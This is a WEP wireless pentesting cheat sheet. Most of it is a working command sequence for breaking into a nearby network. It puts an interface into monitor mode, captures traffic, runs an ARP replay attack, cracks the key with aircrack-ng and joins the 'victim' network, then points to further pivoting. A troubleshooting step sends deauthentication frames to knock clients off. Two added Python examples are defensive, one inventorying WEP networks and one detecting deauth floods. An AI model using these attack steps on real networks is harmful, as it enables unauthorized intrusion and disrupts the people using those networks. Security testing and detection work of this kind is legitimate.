WEP Wireless Pentesting

Step 1) Use a wireless card that supports monitor mode, then create a monitor interface and bring it up with the commands below:

sudo iw dev wlan0 interface add wlan0mon type monitor
sudo ip link set wlan0mon up

Step 2) Run airodump-ng to survey nearby networks, then note the following details for the target network:

sudo airodump-ng wlan0mon
  1. BSSID –
  2. Channel –
  3. ESSID –

Step 3) Stop the process, then run airodump-ng again locked to the target's channel and BSSID to list its associated Stations (clients). See "Troubleshooting Steps" if no Stations appear.

sudo airodump-ng -c <channel> --bssid <BSSID of SSID to attack> wlan0mon
  1. Station –

Step 4) Stop the process, then run airodump-ng again with -w so the captured traffic is written to a capture file (out-01.cap, with a matching out-01.csv summary)

sudo airodump-ng -c <channel> --bssid <BSSID of SSID to attack> -w out wlan0mon
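As an added example (not part of the original cheat sheet), the following Python script reads the CSV summary that airodump-ng writes next to out-01.cap when run with -w out, and reports every network in range that still advertises WEP together with the clients associated to it, which is the inventory a defender wants from the same survey. The CSV layout (an access-point table, a blank line, then a station table, in the column order shown in the sample) is assumed from airodump-ng's documented output, and the sample file is constructed, not a real capture; the ESSID is read from its fixed column, so ESSIDs containing a comma are not handled.

```python
"""Inventory WEP networks from an airodump-ng CSV export.

Added example, not part of the original cheat sheet. Assumes the CSV
layout airodump-ng writes alongside out-01.cap when run with `-w out`:
an access-point table, a blank line, then a station table. The sample
below is constructed for this example, not a real capture.
"""
import csv
import io

# Constructed sample of out-01.csv: one WEP network with one associated
# client, one WPA2 network, and one unassociated probing client.
SAMPLE_CSV = """\
BSSID, First time seen, Last time seen, channel, Speed, Privacy, Cipher, Authentication, Power, # beacons, # IV, LAN IP, ID-length, ESSID, Key
00:11:22:33:44:55, 2024-01-01 10:00:00, 2024-01-01 10:05:00,  6,  54, WEP , WEP, OPN, -40, 120, 3500, 0.  0.  0.  0, 6, LabWEP,
66:77:88:99:AA:BB, 2024-01-01 10:00:00, 2024-01-01 10:05:00, 11,  54, WPA2, CCMP, PSK, -55, 98, 0, 0.  0.  0.  0, 7, LabWPA2,

Station MAC, First time seen, Last time seen, Power, # packets, BSSID, Probed ESSIDs
CC:DD:EE:FF:00:11, 2024-01-01 10:01:00, 2024-01-01 10:05:00, -50, 2400, 00:11:22:33:44:55, LabWEP
22:33:44:55:66:77, 2024-01-01 10:02:00, 2024-01-01 10:05:00, -60, 15, (not associated), LabWPA2
"""


def parse_airodump_csv(text):
    """Split the export into access points and stations (lists of dicts)."""
    aps, stations = [], []
    section = None
    for row in csv.reader(io.StringIO(text), skipinitialspace=True):
        if not row or not any(cell.strip() for cell in row):
            continue                      # blank separator line
        head = row[0].strip()
        if head == "BSSID":               # header of the access-point table
            section = "ap"
            continue
        if head == "Station MAC":         # header of the station table
            section = "sta"
            continue
        cells = [cell.strip() for cell in row]
        if section == "ap" and len(cells) >= 14:
            aps.append({"bssid": cells[0], "channel": cells[3], "privacy": cells[5],
                        "ivs": int(cells[10]), "essid": cells[13]})
        elif section == "sta" and len(cells) >= 6:
            stations.append({"mac": cells[0], "packets": int(cells[4]), "bssid": cells[5]})
    return aps, stations


def wep_report(text):
    """Return every WEP network with the MACs of the clients associated to it."""
    aps, stations = parse_airodump_csv(text)
    report = []
    for ap in aps:
        if not ap["privacy"].upper().startswith("WEP"):
            continue
        clients = [s["mac"] for s in stations if s["bssid"].lower() == ap["bssid"].lower()]
        report.append({"essid": ap["essid"], "bssid": ap["bssid"],
                       "channel": ap["channel"], "clients": clients})
    return report


if __name__ == "__main__":
    for entry in wep_report(SAMPLE_CSV):
        print(f'{entry["essid"]} ({entry["bssid"]}, ch {entry["channel"]}): '
              f'{len(entry["clients"])} client(s) still on WEP')
```

Point the script at a real export by replacing SAMPLE_CSV with the contents of out-01.csv; any network it lists should be scheduled for migration to WPA2/WPA3, and its client list shows which devices will need reconfiguring.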

Step 5) In a second terminal, start the ARP request replay attack (aireplay-ng -3) so the access point keeps generating encrypted traffic

sudo aireplay-ng -3 -b <BSSID of SSID to attack> -h <Station MAC address from Step 3> wlan0mon

Step 6) Wait until the #Data column in airodump-ng reaches roughly 100,000 packets, then stop both the airodump-ng and aireplay-ng processes

Step 7) Recover the WEP key from the capture using aircrack-ng

sudo aircrack-ng out-01.cap

Step 8) Create a wpa_supplicant config file to be used in Step 9

nano wepconfig.conf

network={
        ssid="CHANGE_THIS_TO_THE_VICTIM_ESSID_FROM_STEP_2"
        key_mgmt=NONE
        # quote the key only if it is ASCII; a hex key as printed by aircrack-ng
        # is written without quotes and with the colons removed
        wep_key0="CHANGE_THIS_TO_CRACKED_KEY_FROM_STEP_7"
        wep_tx_keyidx=0
}

Step 9) Connect to the WEP network using wpa_supplicant

sudo wpa_supplicant -B -i wlan0 -c wepconfig.conf

-B run wpa_supplicant in the background

-i the managed (non-monitor) interface to connect with

-c the configuration file created in Step 8

Step 10) Obtain IP address from the wireless router

sudo dhclient -v wlan0

-v for verbose

Step 11) Perform further pivoting / attacks, then disconnect from the network

sudo killall wpa_supplicant

Troubleshooting Steps

If no Stations are listed in Step 3, send deauthentication frames to force connected clients to reconnect, which makes them appear in the airodump-ng Station list

sudo aireplay-ng -0 5 -a <BSSID from Step 2> wlan0mon

-0 5 send five rounds of deauthentication frames (-a gives the BSSID of the access point)
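The deauthentication burst above is exactly what a wireless IDS looks for: a run of deauth frames carrying the access point's address in a short window, usually addressed to the broadcast MAC. As an added example (not part of the original cheat sheet), the Python below parses bare 802.11 management frame headers (radiotap header already stripped, which is an assumption about the input), counts deauth frames per BSSID and transmitter in a sliding window, and raises an alert when the count exceeds a threshold; the frames it runs on are constructed in memory for the example and are never transmitted. The frame-control layout, address offsets and reason-code position follow the 802.11 MAC header format.

```python
"""Flag deauthentication floods in raw 802.11 frames.

Added example, not part of the original cheat sheet. Operates on the
bare 802.11 MAC header (radiotap header already stripped). All frames
below are constructed in memory for the example; nothing is captured
or transmitted.
"""
import struct
from collections import defaultdict

SUBTYPE_BEACON = 0x8
SUBTYPE_DISASSOC = 0xA
SUBTYPE_DEAUTH = 0xC
BROADCAST = "ff:ff:ff:ff:ff:ff"


def _mac(text):
    return bytes.fromhex(text.replace(":", ""))


def _fmt(raw):
    return ":".join(f"{b:02x}" for b in raw)


def _mgmt_frame(subtype, dst, src, bssid, reason=None):
    """Assemble a minimal management frame (version 0, no flags) as test data."""
    frame_control = bytes([subtype << 4, 0x00])   # type bits 00 = management
    duration = b"\x00\x00"
    seq_ctrl = b"\x00\x00"
    frame = frame_control + duration + _mac(dst) + _mac(src) + _mac(bssid) + seq_ctrl
    if reason is not None:
        frame += struct.pack("<H", reason)         # reason code, little-endian
    return frame


def parse_mgmt_frame(frame):
    """Return (subtype, dst, src, bssid, reason) for a management frame, else None."""
    if len(frame) < 24:
        return None
    fc = frame[0]
    if (fc >> 2) & 0x3 != 0:                       # type != 0: control or data frame
        return None
    subtype = (fc >> 4) & 0xF
    reason = None
    if subtype in (SUBTYPE_DISASSOC, SUBTYPE_DEAUTH) and len(frame) >= 26:
        reason = struct.unpack_from("<H", frame, 24)[0]
    return subtype, _fmt(frame[4:10]), _fmt(frame[10:16]), _fmt(frame[16:22]), reason


def detect_deauth_flood(frames, window_s=1.0, threshold=5):
    """frames: iterable of (timestamp_seconds, frame_bytes).
    Alert on any (bssid, transmitter) pair that sends `threshold` or more
    deauth frames inside a sliding `window_s` window."""
    stamps = defaultdict(list)
    broadcast = set()
    for ts, frame in frames:
        parsed = parse_mgmt_frame(frame)
        if parsed is None or parsed[0] != SUBTYPE_DEAUTH:
            continue
        _, dst, src, bssid, _ = parsed
        stamps[(bssid, src)].append(ts)
        if dst == BROADCAST:                       # broadcast deauth: strong flood indicator
            broadcast.add((bssid, src))
    alerts = []
    for key, times in stamps.items():
        times.sort()
        start, peak = 0, 0
        for end in range(len(times)):
            while times[end] - times[start] > window_s:
                start += 1
            peak = max(peak, end - start + 1)
        if peak >= threshold:
            alerts.append({"bssid": key[0], "source": key[1],
                           "peak_per_window": peak, "broadcast": key in broadcast})
    return alerts


AP = "00:11:22:33:44:55"        # constructed addresses for the sample trace
CLIENT = "cc:dd:ee:ff:00:11"

# Constructed trace: six broadcast deauths carrying the AP's address within
# 0.25 s, a normal beacon, then one genuine AP-to-client deauth 30 s later.
SAMPLE_FRAMES = (
    [(i * 0.05, _mgmt_frame(SUBTYPE_DEAUTH, BROADCAST, AP, AP, reason=7)) for i in range(6)]
    + [(0.30, _mgmt_frame(SUBTYPE_BEACON, BROADCAST, AP, AP))]
    + [(30.0, _mgmt_frame(SUBTYPE_DEAUTH, CLIENT, AP, AP, reason=2))]
)

if __name__ == "__main__":
    for alert in detect_deauth_flood(SAMPLE_FRAMES):
        print(alert)
```

The single genuine deauth at the end never trips the threshold, which is the point of the sliding window: legitimate access points do send occasional deauths, so the signal is the rate, not the frame itself. Networks that support 802.11w (management frame protection) make spoofed deauths ineffective in the first place; WEP networks cannot use it, which is one more reason the inventory from Step 4 matters.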

References

https://www.aircrack-ng.org/doku.php?id=deauthentication